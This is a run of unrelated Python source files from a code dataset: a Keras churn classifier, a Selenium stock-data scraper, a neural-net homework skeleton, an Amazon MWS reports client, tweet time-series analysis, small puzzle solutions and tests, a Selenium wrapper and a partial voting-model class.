stengel/client_ai.py","file_name":"client_ai.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"149894141","text":"# author: mofhu@github\n# A. Spell Check\n\nt = int(input())\n\nfor ncase in range(1, t+1):\n n = int(input())\n s = [i for i in input()]\n s.sort()\n if ''.join(s) == 'Timru':\n ans = 'YES'\n else:\n ans = 'NO'\n print(ans)\n\n","sub_path":"codeforces/Round817/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"376128890","text":"\n#%% \n# Importing the libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n\n#%%\n# Importing the dataset\ndataset = pd.read_csv('Churn_Modelling.csv')\n\nX = dataset.iloc[:, 3:13].values\ny = dataset.iloc[:, 13].values\n\n#%%\n# Encoding categorical data\n# Encoding the Independent Variable\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\nfrom sklearn.compose import ColumnTransformer\n\nct = ColumnTransformer([(\"Country\", OneHotEncoder(), [1])], remainder = 'passthrough')\nX = ct.fit_transform(X)\n#%%\n# Male/Female\nlabelencoder_X = LabelEncoder()\nX[:, 4] = labelencoder_X.fit_transform(X[:, 4])\nX = X[: , 1:]\n\n#%%\n# Splitting the dataset into the Training set and Test set\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)\n\n#%%\n# Feature Scaling\nfrom sklearn.preprocessing import StandardScaler\nsc = StandardScaler()\nX_train = sc.fit_transform(X_train)\nX_test = sc.transform(X_test)\n\n#%%\n# Make ANN\n# Importing Keras Library\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense\n#%%\nfrom keras.layers import Dropout\n\n#%%\n# Initialize ANN\nclassifier = Sequential()\n\n#%%\n# Adding first input and hiddent layer \nclassifier.add(Dense(units=6,kernel_initializer='uniform',activation='relu' ,input_shape=(11,)))\nclassifier.add(Dropout(rate=0.1))\n# Adding another hidden layer\nclassifier.add(Dense(6,kernel_initializer='uniform',activation='relu'))\nclassifier.add(Dropout(rate=0.1))\n# Adding output layer\nclassifier.add(Dense(1,kernel_initializer='uniform',activation='sigmoid'))\n\n#%%\n# Compiling the ANN\nclassifier.compile(optimizer='adam',loss='binary_crossentropy',metrics=['accuracy'])\n\n#%%\n# Fitting the ANN to the Training set\nclassifier.fit(x=X_train,y=y_train,batch_size=10,epochs=100)\n\n#%%\n# Fitting classifier to the Training set\n# Create your classifier here\n\n# Predicting the Test set results\ny_pred = classifier.predict(X_test)\ny_pred = (y_pred > 0.5)\n\n#%%\n# Predict a Single customer\n\nnew_prediction = classifier.predict(sc.transform(np.array([[0,0,600,1,40,3,60000,2,1,1,5000]])))\n#%%\n# Making the Confusion Matrix\nfrom sklearn.metrics import confusion_matrix\ncm = confusion_matrix(y_test, y_pred)\n\n\n# %%\n# Evaluating ANN\nfrom keras.wrappers.scikit_learn import KerasClassifier\nfrom sklearn.model_selection import cross_val_score\n\ndef build_classifier () :\n classifierB = Sequential()\n classifierB.add(Dense(units=6,kernel_initializer='uniform',activation='relu' ,input_shape=(11,)))\n classifierB.add(Dense(6,kernel_initializer='uniform',activation='relu'))\n classifierB.add(Dense(1,kernel_initializer='uniform',activation='sigmoid'))\n classifierB.compile(optimizer='adam',loss='binary_crossentropy',metrics=['accuracy'])\n return classifierB\n\nclassifierD = KerasClassifier(build_fn = build_classifier,batch_size = 10 ,epochs = 100)\naccuracies = cross_val_score(estimator = classifierD , X = X_train , y = y_train , cv = 10 , n_jobs = -1)\n\n#%%\nmean = accuracies.mean()\n\n# %%\n# Tuning ANN\nfrom sklearn.model_selection import GridSearchCV\n\ndef build_classifier (optimize) :\n classifierB = Sequential()\n classifierB.add(Dense(units=6,kernel_initializer='uniform',activation='relu' ,input_shape=(11,)))\n classifierB.add(Dense(6,kernel_initializer='uniform',activation='relu'))\n classifierB.add(Dense(1,kernel_initializer='uniform',activation='sigmoid'))\n classifierB.compile(optimizer= optimize,loss='binary_crossentropy',metrics=['accuracy'])\n return classifierB\n\nclassifierD = KerasClassifier(build_fn = build_classifier)\ngridParameters = {'batch_size': [25,32],'epochs': [100,500],'optimize':['adam','rmsprop']}\ngrid_search = GridSearchCV(estimator=classifierD,param_grid=gridParameters,scoring='accuracy',cv=10)\ngrid_search = grid_search.fit(X=X_train,y=y_train)\nbest_parameters = grid_search.best_params_\nbest_accuracy = grid_search.best_score_\n\n\n# %%\n","sub_path":"Training/Artificial_Neural_Networks/AnnTraining.py","file_name":"AnnTraining.py","file_ext":"py","file_size_in_byte":3953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"488799919","text":"import os, sys, re, shutil, requests, bs4, subprocess, requests, math, time\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import Select\nfrom datetime import datetime\nfrom datetime import timedelta\nimport sqlite3\n\nchrome_path = \"C:\\chromedriver\\chromedriver.exe\"\nweb = webdriver.Chrome(chrome_path)\nweb.get('http://mops.twse.com.tw/mops/web/t05st03')\n\nString_Search = re.compile(r'(\\(.*?\\))')\n\nconn = sqlite3.connect('stock_list.db')\nc = conn.cursor()\ncursor = c.execute(\"SELECT stock_id, stock_name, start_date, stock_type, business from stock_list\")\n\npath = os.getcwd()\npath = path + '\\\\stock_db'\nos.chdir(path)\nprint(os.getcwd())\n\nfor current_entry in cursor:\n cannot_find = 0\n if ((current_entry[3] == '上櫃') or (current_entry[3] == '上市')) and (current_entry[4] != 'ETF'):\n input1 = web.find_element_by_id('co_id')\n input1.clear()\n input1.send_keys(current_entry[0])\n n = 0\n while 1:\n web.find_element_by_xpath(\"//input [@value=' 查詢 ']\").click()\n time.sleep(7)\n soup = bs4.BeautifulSoup(web.page_source, \"lxml\")\n table_keystring = soup.find('th', string='已發行普通股數或TDR原股發行股數')\n n = n + 1\n if table_keystring != None:\n break\n elif n == 5:\n cannot_find = 1\n break\n if cannot_find == 1:\n continue\n print(table_keystring)\n next_td_tag = table_keystring.findNext('td')\n result = String_Search.search(next_td_tag.getText())\n capital_amount = next_td_tag.getText().replace(result.group(1),'').strip().replace(',','').replace('股','')\n db_name = current_entry[0] + '.db'\n print(db_name)\n print(capital_amount)\n conn_stock = sqlite3.connect(db_name)\n c_stock = conn_stock.cursor()\n sql_cmd = 'REPLACE INTO stock_info (date_ID, capital_amount) VALUES (1,' + capital_amount + ')'\n print(sql_cmd)\n c_stock.execute(sql_cmd)\n conn_stock.commit()\n conn_stock.close()\n\npath = os.getcwd()\npath = path.replace('\\\\stock_db','')\nos.chdir(path)\n\nconn.close()\nweb.close()\n","sub_path":"8_stock_capital_amount.py","file_name":"8_stock_capital_amount.py","file_ext":"py","file_size_in_byte":2239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"336021751","text":"import copy\nimport sys\nfrom datetime import datetime\nfrom math import exp\nfrom random import random, randint, choice\n\n\nclass Perceptron:\n \"\"\"\n Class to represent a single Perceptron in the net.\n \"\"\"\n\n def __init__(self, in_size=1, weights=None):\n self.inSize = in_size + 1 # number of perceptrons feeding into this one; add one for bias\n if weights is None:\n # weights of previous layers into this one, random if passed in as None\n self.weights = [1.0] * self.inSize\n self.set_random_weights()\n else:\n self.weights = weights\n\n def get_weighted_sum(self, in_acts):\n \"\"\"\n Returns the sum of the input weighted by the weights.\n \n Inputs:\n in_acts (list): input values, same as length as inSize\n Returns:\n float\n The weighted sum\n \"\"\"\n return sum([inAct * inWt for inAct, inWt in zip(in_acts, self.weights)])\n\n def sigmoid(self, value):\n \"\"\"\n Return the value of a sigmoid function.\n \n Args:\n value (float): the value to get sigmoid for\n Returns:\n float\n The output of the sigmoid function parametrized by \n the value.\n \"\"\"\n \"\"\"YOUR CODE\"\"\"\n\n def sigmoid_activation(self, in_acts):\n \"\"\"\n Returns the activation value of this Perceptron with the given input.\n Same as g(z) in book.\n Remember to add 1 to the start of inActs for the bias input.\n \n Inputs:\n in_acts (list): input values, not including bias\n Returns:\n float\n The value of the sigmoid of the weighted input\n \"\"\"\n \"\"\"YOUR CODE\"\"\"\n\n def sigmoid_deriv(self, value):\n \"\"\"\n Return the value of the derivative of a sigmoid function.\n \n Args:\n value (float): the value to get sigmoid for\n Returns:\n float\n The output of the derivative of a sigmoid function\n parametrized by the value.\n \"\"\"\n \"\"\"YOUR CODE\"\"\"\n\n def sigmoid_activation_deriv(self, in_acts):\n \"\"\"\n Returns the derivative of the activation of this Perceptron with the\n given input. Same as g'(z) in book (note that this is not rounded.\n Remember to add 1 to the start of inActs for the bias input.\n \n Inputs:\n in_acts (list): input values, not including bias\n Returns:\n int\n The derivative of the sigmoid of the weighted input\n \"\"\"\n \"\"\"YOUR CODE\"\"\"\n\n def update_weights(self, in_acts, alpha, delta):\n \"\"\"\n Updates the weights for this Perceptron given the input delta.\n Remember to add 1 to the start of inActs for the bias input.\n \n Inputs:\n in_acts (list): input values, not including bias\n alpha (float): The learning rate\n delta (float): If this is an output, then g'(z)*error\n If this is a hidden unit, then the as defined-\n g'(z)*sum over weight*delta for the next layer\n Returns:\n float\n Return the total modification of all the weights (sum of each abs(modification))\n \"\"\"\n total_modification = 0\n \"\"\"YOUR CODE\"\"\"\n return total_modification\n\n def set_random_weights(self):\n \"\"\"\n Generates random input weights that vary from -1.0 to 1.0\n \"\"\"\n for i in range(self.inSize):\n self.weights[i] = (random() + .0001) * (choice([-1, 1]))\n\n def __str__(self):\n outStr = ''\n outStr += 'Perceptron with %d inputs\\n' % self.inSize\n outStr += 'Node input weights %s\\n' % str(self.weights)\n return outStr\n\n\nclass NeuralNet:\n \"\"\"\n Class to hold the net of perceptrons and implement functions for it.\n \"\"\"\n\n def __init__(self, layer_size): # default 3 layer, 1 percep per layer\n \"\"\"\n Initiates the NN with the given sizes.\n \n Args:\n layer_size (list): the number of perceptrons in each layer\n \"\"\"\n self.layer_size = layer_size # Holds number of inputs and percepetrons in each layer\n self.output_layer = []\n self.num_hidden_layers = len(layer_size) - 2\n self.hidden_layers = [[] for x in range(self.num_hidden_layers)]\n self.num_layers = self.num_hidden_layers + 1\n\n # build hidden layer(s)\n for h in range(self.num_hidden_layers):\n for p in range(layer_size[h + 1]):\n percep = Perceptron(layer_size[h]) # num of perceps feeding into this one\n self.hidden_layers[h].append(percep)\n\n # build output layer\n for i in range(layer_size[-1]):\n percep = Perceptron(layer_size[-2]) # num of perceps feeding into this one\n self.output_layer.append(percep)\n\n # build layers list that holds all layers in order - use this structure\n # to implement back propagation\n self.layers = [self.hidden_layers[h] for h in range(self.num_hidden_layers)] + [self.output_layer]\n\n def __str__(self):\n out_str = ''\n out_str += '\\n'\n for hidden_index in range(self.num_hidden_layers):\n out_str += '\\nHidden Layer #%d' % hidden_index\n for index in range(len(self.hidden_layers[hidden_index])):\n out_str += 'Percep #%d: %s' % (index, str(self.hidden_layers[hidden_index][index]))\n out_str += '\\n'\n for i in range(len(self.output_layer)):\n out_str += 'Output Percep #%d:%s' % (i, str(self.output_layer[i]))\n return out_str\n\n def feed_forward(self, in_acts):\n \"\"\"\n Propagate input vector forward to calculate outputs.\n \n Args:\n in_acts (list): the input to the NN (an example)\n Returns:\n list>\n A list of lists. The first list is the input list, and the others are\n lists of the output values of all perceptrons in each layer.\n \"\"\"\n \"\"\"YOUR CODE\"\"\"\n\n def backprop_learning(self, examples, alpha):\n \"\"\"\n Run a single iteration of backward propagation learning algorithm.\n See the text and slides for pseudo code.\n \n Args: \n examples (list,list>>):\n for each tuple first element is input(feature)\"vector\" (list)\n second element is output \"vector\" (list)\n alpha (float): the alpha to training with\n Returns\n tuple\n \n A tuple of average_error and average_weight_change, to be used as stopping conditions.\n average_error is the summed error^2/2 of all examples, divided by numExamples*numOutputs.\n average_weight_change is the summed absolute weight change of all perceptrons,\n divided by the sum of their input sizes (the average weight change for a single perceptron).\n \"\"\"\n # keep track of output\n average_error = 0\n average_weight_change = 0\n num_weights = 0\n\n for example in examples: # for each example\n # keep track of deltas to use in weight change\n deltas = []\n # Neural net output list\n all_layer_output = \"\"\"FILL IN - neural net output list computation\"\"\"\n last_layer_output = all_layer_output[-1]\n # Empty output layer delta list\n out_delta = []\n # iterate through all output layer neurons\n for output_num in range(len(example[1])):\n g_prime = self.output_layer[output_num].sigmoid_activation_deriv(\"\"\"FILL IN\"\"\")\n error = \"\"\"FILL IN - error for this neuron\"\"\"\n delta = \"\"\"FILL IN - delta for this neuron\"\"\"\n average_error += error * error / 2\n out_delta.append(delta)\n deltas.append(out_delta)\n\n \"\"\"\n Backpropagate through all hidden layers, calculating and storing\n the deltas for each perceptron layer.\n \"\"\"\n for layer_num in range(self.num_hidden_layers - 1, -1, -1):\n layer = self.layers[layer_num]\n next_layer = self.layers[layer_num + 1]\n hidden_delta = []\n # Iterate through all neurons in this layer\n for neuronNum in range(len(layer)):\n g_prime = layer[neuronNum].sigmoidActivationDeriv(\"\"\"FILL IN\"\"\")\n delta = \"\"\"FILL IN - delta for this neuron\n Carefully look at the equation here,\n it is easy to do this by intuition incorrectly\"\"\"\n hidden_delta.append(delta)\n deltas = [hidden_delta] + deltas\n \"\"\"Get output of all layers\"\"\"\n\n \"\"\"\n Having aggregated all deltas, update the weights of the \n hidden and output layers accordingly.\n \"\"\"\n for num_layer in range(0, self.num_layers):\n layer = self.layers[num_layer]\n for numNeuron in range(len(layer)):\n weight_mod = layer[numNeuron].updateWeights(\"\"\"FILL IN\"\"\")\n average_weight_change += weight_mod\n num_weights += layer[numNeuron].inSize\n # end for each example\n # calculate final output\n average_error /= (len(examples) * len(examples[0][1])) # number of examples x length of output vector\n average_weight_change /= (num_weights)\n return average_error, average_weight_change\n\n\ndef build_neural_net(examples, alpha=0.1, weight_change_threshold=0.00008, hidden_layer_list=[1], max_iter=sys.maxint,\n start_nn=None):\n \"\"\"\n Train a neural net for the given input.\n \n Args: \n examples (tuple>,\n list>>): A tuple of training and test examples\n alpha (float): the alpha to train with\n weight_change_threshold (float): The threshold to stop training at\n max_iter (int): Maximum number of iterations to run\n hidden_layer_list (list): The list of numbers of Perceptrons\n for the hidden layer(s). \n start_nn (NeuralNet): A NeuralNet to train, or none if a new NeuralNet\n can be trained from random weights.\n Returns\n tuple\n \n A tuple of the trained Neural Network and the accuracy that it achieved \n once the weight modification reached the threshold, or the iteration \n exceeds the maximum iteration.\n \"\"\"\n examples_train, examples_test = examples\n num_in = len(examples_train[0][0])\n num_out = len(examples_test[0][1])\n time = datetime.now().time()\n if start_nn is not None:\n hidden_layer_list = [len(layer) for layer in start_nn.hidden_layers]\n print(\n \"Starting training at time %s with %d inputs, %d outputs, %s hidden layers, size of training set %d, and size of test set %d\" \\\n % (str(time), num_in, num_out, str(hidden_layer_list), len(examples_train), len(examples_test)))\n layer_list = [num_in] + hidden_layer_list + [num_out]\n nnet = NeuralNet(layer_list)\n if start_nn is not None:\n nnet = start_nn\n \"\"\"\n YOUR CODE\n \"\"\"\n iteration = 0\n train_error = 0\n weight_mod = 0\n\n \"\"\"\n Iterate for as long as it takes to reach weight modification threshold\n \"\"\"\n # if iteration%10==0:\n # print('! on iteration %d; training error %f and weight change %f'%(iteration,train_error,weight_mod))\n # else :\n # print('.',end='')\n\n\n time = datetime.now().time()\n print('Finished after %d iterations at time %s with training error %f and weight change %f' % (\n iteration, str(time), train_error, weight_mod))\n\n \"\"\"\n Get the accuracy of your Neural Network on the test examples.\n\tFor each text example, you should first feedforward to get the NN outputs. Then, round the list of outputs from the output layer of the neural net.\n\tIf the entire rounded list from the NN matches with the known list from the test example, then add to test_correct, else add to test_error.\n \"\"\"\n\n test_error = 0\n test_correct = 0\n\n test_accuracy = 0 # num correct/num total\n\n print('Feed Forward Test correctly classified %d, incorrectly classified %d, test percent error %f\\n' % (\n test_correct, test_error, test_accuracy))\n\n \"\"\"return something\"\"\"\n","sub_path":"prj4Instructions/python/NeuralNet.py","file_name":"NeuralNet.py","file_ext":"py","file_size_in_byte":12806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"388408787","text":"from .utils import flatten_list\n\n\nclass Reports(object):\n \"\"\"\n Implements a report client for Amazon MWS.\n\n The report API works differently from other APIs and\n it is important to have a good understanding of\n how this API works from `MWS reports overview\n `__\n \"\"\" # noqa: E501\n VERSION = '2009-01-01'\n URI = '/Reports/' + VERSION\n\n def __init__(self, client):\n self.client = client\n\n def request_report(self, **kwargs):\n \"\"\"\n Creates a report request and submits the request to Amazon MWS.\n\n Amazon MWS processes the report request and when the report is\n completed, sets the status of the report request to _DONE_.\n Reports are retained for 90 days.\n\n `Learn more `__\n \"\"\" # noqa: E501\n flatten_list(kwargs, 'MarketplaceIdList', 'Id')\n return self.client.post(\n 'RequestReport', self.URI, kwargs, self.VERSION\n )\n\n def get_report_request_list(self, **kwargs):\n \"\"\"\n Returns a list of report requests that you can use to get the\n ReportRequestId for a report.\n\n `Learn more `__\n \"\"\" # noqa: E501\n flatten_list(kwargs, 'ReportTypeList', 'Type')\n flatten_list(kwargs, 'ReportRequestIdList', 'Id')\n flatten_list(kwargs, 'ReportProcessingStatusList', 'Status')\n return self.client.get(\n 'GetReportRequestList', self.URI, kwargs, self.VERSION\n )\n\n def get_report_request_list_by_next_token(self, NextToken):\n \"\"\"\n Returns a list of report requests using the NextToken,\n which was supplied by a previous request to either\n GetReportRequestListByNextToken or GetReportRequestList,\n where the value of HasNext was true in that previous request.\n\n `Learn more `__\n \"\"\" # noqa: E501\n return self.client.get(\n 'GetReportRequestListByNextToken', self.URI,\n {'NextToken': NextToken}, self.VERSION\n )\n\n def get_report_request_count(self, **kwargs):\n \"\"\"\n Returns a count of report requests that have been submitted\n to Amazon MWS for processing.\n\n `Learn more `__\n \"\"\" # noqa: E501\n return self.client.get(\n 'GetReportRequestCount', self.URI, kwargs, self.VERSION\n )\n\n def cancel_report_request(self, **kwargs):\n \"\"\"\n Cancels one or more report requests.\n\n `Learn more `__\n \"\"\" # noqa: E501\n return self.client.post(\n 'CancelReportRequests', self.URI, kwargs, self.VERSION\n )\n\n def get_report_list(self, **kwargs):\n \"\"\"\n Returns a list of reports that were created in the previous 90 days.\n\n `Learn more `__\n \"\"\" # noqa: E501\n flatten_list(kwargs, 'ReportTypeList', 'Type')\n flatten_list(kwargs, 'ReportRequestIdList', 'Id')\n flatten_list(kwargs, 'MarketplaceIdList', 'Id')\n return self.client.get(\n 'GetReportList', self.URI, kwargs, self.VERSION\n )\n\n def get_report_list_by_next_token(self, NextToken):\n \"\"\"\n Returns a list of reports using the NextToken, which was supplied\n by a previous request to either GetReportListByNextToken or\n GetReportList, where the value of HasNext was true in the\n previous call.\n\n `Learn more `__\n \"\"\" # noqa: E501\n return self.client.get(\n 'GetReportListByNextToken', self.URI,\n {'NextToken': NextToken}, self.VERSION\n )\n\n def get_report_count(self, **kwargs):\n \"\"\"\n Returns a count of the reports, created in the previous 90 days,\n with a status of _DONE_ and that are available for download.\n\n `Learn more `__\n \"\"\" # noqa: E501\n return self.client.get(\n 'GetReportCount', self.URI, kwargs, self.VERSION\n )\n\n def get_report(self, ReportId):\n \"\"\"\n Returns the contents of a report and the Content-MD5 header for the\n returned report body.\n\n `Learn more `__\n \"\"\" # noqa: E501\n return self.client.get(\n 'GetReport', self.URI,\n {'ReportId': ReportId}, self.VERSION\n )\n","sub_path":"pymws/reports.py","file_name":"reports.py","file_ext":"py","file_size_in_byte":5107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"573925008","text":"import json\nimport pandas as pd\nfrom datetime import datetime, timedelta\nfrom pandas.tseries.resample import TimeGrouper\nfrom pandas.tseries.offsets import DateOffset\nfrom NLP.Turkish.TweetUtils import preprocessTweet\n\npd.options.display.width = 400\npd.options.display.max_colwidth = 150\n\n\ndef isValidTweet(tweet):\n return \"created_at\" in tweet\n\n\ndef getText(tweet):\n if \"retweeted_status\" in tweet:\n return tweet[\"retweeted_status\"][\"text\"]\n else:\n return tweet[\"text\"]\n\n\ndef getTweetJsonData():\n filePath = \"/media/sf_ubuntu/TURKEY/500.json\"\n tweets_json = []\n\n with open(filePath) as json_data:\n for line in json_data:\n tweet = json.loads(line)\n if isValidTweet(tweet):\n tweets_json.append(tweet)\n\n return tweets_json\n\n\ntweets_json = getTweetJsonData()\n\ntweets = pd.DataFrame()\ntweets[\"created_at\"] = pd.to_datetime([t[\"created_at\"] for t in tweets_json])\ntweets[\"created_at\"] = tweets[\"created_at\"] + timedelta(hours=3)\ntweets.set_index('created_at', drop=False, inplace=True)\ntweets[\"text\"] = [getText(t) for t in tweets_json]\ntweets[\"user_id\"] = [t[\"user\"][\"id\"] for t in tweets_json]\ntweets.describe()\n\ntweets1m = tweets['created_at'].resample('1t').count()\ntweets1m.head()\navg = tweets1m.mean()\n\nimport vincent\nvincent.core.initialize_notebook()\narea = vincent.Area(tweets1m)\narea.colors(brew='Spectral')\narea.display()","sub_path":"NLP/Turkish/EDA_TIME_SERIES.py","file_name":"EDA_TIME_SERIES.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"646305547","text":"\"\"\"https://projecteuler.net/problem=13\"\"\"\n\nimport unittest\nfrom project_euler.problem_13 import chop_into_list, solve, INPUT\n\n\nclass Problem13Test(unittest.TestCase):\n \"\"\"Test fixture for problem 13.\"\"\"\n\n def test_chop_into_list_with_problem_input(self):\n \"\"\"Tests the function using the problem's input.\"\"\"\n expected = 100 # The string should be sliced into 100 substrings.\n size = 50\n\n actual = chop_into_list(INPUT, size)\n\n self.assertEqual(expected, len(actual))\n\n def test_solve_with_simple_input(self):\n \"\"\"Tests the solve function using a simple input string.\"\"\"\n expected = \"1368\" # The sum of 123 + 456 + 789\n simple_input = \"123456789\"\n size = 3\n\n actual = solve(simple_input, size)\n\n self.assertEqual(expected, actual)\n\n def test_solve_with_actual_input(self):\n \"\"\"Test that confirms the answer to the problem.\"\"\"\n expected = \"5537376230\"\n size = 50\n\n actual = solve(INPUT, size)\n\n self.assertEqual(expected, actual)","sub_path":"Python/project_euler/tests/problem_13_test.py","file_name":"problem_13_test.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"41935070","text":"\"\"\"\n@time : 2020/1/14下午10:13\n@Author: kongwiki\n@File: 136.SingleNumber.py\n@Email: kongwiki@163.com\n\"\"\"\n\"\"\"\n寻找单个的元素\n\"\"\"\n\n\nclass Solution:\n\tdef singleNumber(self, nums):\n\t\t\"\"\"\n\n\t\t:param nums: a list\n\t\t:return:\n\t\t\"\"\"\n\t\tnums_dict = {}\n\t\tfor i in nums:\n\t\t\tif i in nums_dict:\n\t\t\t\tnums_dict[i] += 1\n\t\t\telse:\n\t\t\t\tnums_dict[i] = 1\n\t\treturn sorted(nums_dict.items(), key=lambda x: x[1], reverse=False)[0][0]\n\n\nif __name__ == '__main__':\n\ta = [4, 1, 2, 1, 2]\n\ts = Solution()\n\tnumber = s.singleNumber(a)\n\tprint(number)\n\tprint(1^5)","sub_path":"136.SingleNumber.py","file_name":"136.SingleNumber.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"261087010","text":"from selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\n\r\n\r\nclass Browser():\r\n \"\"\"Abstracted Selenium functionality for simpler use.\r\n\r\n Attributes\r\n ----------\r\n driver : selenium.webdriver object\r\n The webdriver object will differ depending on the browser used.\r\n driver_wait : selenium.webdriver.support.ui.WebDriverWait\r\n \"\"\"\r\n\r\n def __init__(self, browser, driver_path=None, driver_wait_time=30):\r\n \"\"\"\r\n Parameters\r\n ----------\r\n browser : str\r\n Valid options are: \"chrome\", \"edge\", \"firefox\", \"ie\"\r\n driver_path : str, optional\r\n File path to webdriver. Will look in PATH if not set.\r\n driver_wait_time : int, optional\r\n Amount of time in seconds to wait when locating elements before\r\n timing out in seconds.\r\n \"\"\"\r\n self.driver = self._get_driver(browser, driver_path)\r\n self.driver_wait = WebDriverWait(\r\n driver=self.driver, timeout=driver_wait_time\r\n )\r\n\r\n def _get_driver(self, browser, driver_path):\r\n lowercased_browser = browser.lower()\r\n if lowercased_browser == \"chrome\":\r\n driver = webdriver.Chrome() if driver_path is None else \\\r\n webdriver.Chrome(executable_path=driver_path)\r\n elif lowercased_browser in (\"edge\", \"msedge\"):\r\n driver = webdriver.Edge() if driver_path is None else \\\r\n webdriver.Edge(executable_path=driver_path)\r\n elif lowercased_browser == \"firefox\":\r\n driver = webdriver.Firefox() if driver_path is None else \\\r\n webdriver.Firefox(executable_path=driver_path)\r\n elif lowercased_browser in (\r\n \"ie\", \"internetexplorer\", \"internet_explorer\", \"internet explorer\"\r\n ):\r\n driver = webdriver.Ie() if driver_path is None else \\\r\n webdriver.Ie(executable_path=driver_path)\r\n return driver\r\n\r\n def go_to(self, url):\r\n self.driver.get(url)\r\n\r\n def get(self, url):\r\n self.driver.get(url)\r\n\r\n def get_element(self, locator, waiting=True):\r\n if waiting:\r\n element = self.driver_wait.until(\r\n EC.visibility_of_element_located(\r\n locator\r\n )\r\n )\r\n else:\r\n element = self.driver.find_element(\r\n locator\r\n )\r\n return element\r\n\r\n def get_element_by_id(self, id, waiting=True):\r\n if waiting:\r\n element = self.driver_wait.until(\r\n EC.visibility_of_element_located(\r\n (By.ID, id)\r\n )\r\n )\r\n else:\r\n element = self.driver.find_element_by_id(id)\r\n return element\r\n\r\n def get_element_by_name(self, name, waiting=True):\r\n if waiting:\r\n element = self.driver_wait.until(\r\n EC.visibility_of_element_located(\r\n (By.NAME, name)\r\n )\r\n )\r\n else:\r\n element = self.driver.find_element_by_name(name)\r\n return element\r\n\r\n def get_element_by_xpath(self, xpath, waiting=True):\r\n if waiting:\r\n element = self.driver_wait.until(\r\n EC.visibility_of_element_located(\r\n (By.XPATH, xpath)\r\n )\r\n )\r\n else:\r\n element = self.driver.find_element_by_xpath(xpath)\r\n return element\r\n\r\n def get_element_by_link_text(self, link_text, waiting=True):\r\n if waiting:\r\n element = self.driver_wait.until(\r\n EC.visibility_of_element_located(\r\n (By.LINK_TEXT, link_text)\r\n )\r\n )\r\n else:\r\n element = self.driver.find_element_by_link_text(link_text)\r\n return element\r\n\r\n def get_element_by_partial_link_text(\r\n self, partial_link_text, waiting=True\r\n ):\r\n if waiting:\r\n element = self.driver_wait.until(\r\n EC.visibility_of_element_located(\r\n (By.PARTIAL_LINK_TEXT, partial_link_text)\r\n )\r\n )\r\n else:\r\n element = self.driver.find_element_by_link_text(\r\n partial_link_text\r\n )\r\n return element\r\n\r\n def get_element_by_tag_name(self, tag_name, waiting=True):\r\n if waiting:\r\n element = self.driver_wait.until(\r\n EC.visibility_of_element_located(\r\n (By.TAG_NAME, tag_name)\r\n )\r\n )\r\n else:\r\n element = self.driver.find_element_by_tag_name(tag_name)\r\n return element\r\n\r\n def get_element_by_class_name(self, class_name, waiting=True):\r\n if waiting:\r\n element = self.driver_wait.until(\r\n EC.visibility_of_element_located(\r\n (By.CLASS_NAME, class_name)\r\n )\r\n )\r\n else:\r\n element = self.driver.find_element_by_class_name(class_name)\r\n return element\r\n\r\n def get_element_by_css_selector(self, css_selector, waiting=True):\r\n if waiting:\r\n element = self.driver_wait.until(\r\n EC.visibility_of_element_located(\r\n (By.CSS_SELECTOR, css_selector)\r\n )\r\n )\r\n else:\r\n element = self.driver.find_element_by_css_selector(css_selector)\r\n return element\r\n\r\n def scroll_into_view(self, element):\r\n self.driver.execute_script(\r\n \"arguments[0].scrollIntoView();\", element\r\n )\r\n\r\n def close(self):\r\n self.driver.close()\r\n","sub_path":"selenium_wrapper.py","file_name":"selenium_wrapper.py","file_ext":"py","file_size_in_byte":5852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"231469276","text":"from data import Models\nimport random\n\nclass Voter(object):\n def __init__(self, id,\n preference_list,\n utilities_dict,\n vote,\n s):\n \"\"\"\n :param id: the voter id\n :param preference_list: (list) the voter preference, the candidate he prefer the most will be in index 0 and so on\n :param utilities_dict: (dict) key: candidate, value: the voter utility if the candidate wins\n :param vote: (str) the candidate name the voters votes for\n \"\"\"\n self.id = id\n self.preference_list = preference_list\n self.utilities_dict = utilities_dict\n self.vote = vote\n self.s = s\n self.models = Models()\n\n def get_CV_parameter(self, voters_list, division_param, l_bound, u_bound):\n \"\"\"\n :param voters_list: (list) the voters list\n :param division_param: (int) how many b values the user wants to check\n :param l_bound: (int) the lower bound for the parameter\n :param u_bound: (int) the upper bound for the parameter\n :return: the pivotal p\n \"\"\"\n model_values_dict = {}\n for i in range(1, division_param + 1):\n psai = l_bound + int(i * (u_bound - l_bound) / division_param)\n pivotal_dict = self.models.pivotal_p(psai, voters_list)\n model_value = self.models.CV(pivotal_dict, self.utilities_dict)\n model_values_dict[psai] = model_value\n return model_values_dict, self.s\n\n def get_KP_parameter(self, k):\n \"\"\"\n :param k: (int) how big is the winners group\n :return: predication by KP model for each size\n \"\"\"\n model_values_dict = {}\n if k not in [1,2,3]:\n raise RuntimeError('k can be only 1, 2 or 3 and not {0}'.format(k))\n candidate_score = self.s\n candidate_list = [(k, v) for k, v in candidate_score.items()]\n 